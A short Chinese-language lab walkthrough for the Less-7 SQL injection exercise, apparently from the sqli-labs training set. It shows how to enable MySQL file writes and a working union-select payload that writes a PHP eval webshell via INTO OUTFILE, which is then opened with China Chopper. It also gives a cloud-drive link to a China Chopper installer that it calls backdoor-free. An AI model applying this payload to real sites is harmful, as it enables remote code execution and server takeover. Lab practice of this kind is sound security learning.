Less-7

使用中国菜刀连接，拿到shell。

1.开启写入权限

使用show variables like '%secure%'在MySQL命令行中判断

show variables like '%secure%';

如果这里为Null就没有写入权限

2.如何修改本地写入权限

通过修改 MySQL 下的 my.ini 配置文件就可以启用权限，需要把下面这个字符串写入文件中。

secure_file_priv="/"

再次查看此参数，若参数值不为 null 则修改成功。

3.判断注入

使用单引号报错，但使用- - +注释符未回显正常，继续探测…

当使用单引号+双括号探测时，使用- -+回显正常，成功找到注入点。

使用into outfile写入函数

?id=1')) union select 1,2,'<?php @eval($_POST["caidao"]);?>' into outfile "写入自己的路径"--+

WebShell

使用中国菜刀连接

连接成功

还可以使用终端打开，可见一句话被写入的危害。

中国菜刀安装包（此包从GitHub下载无后门）：

https://pan.baidu.com/s/1MCY4TDR_xJwZPFKKvse4Ig

提取码：nw6x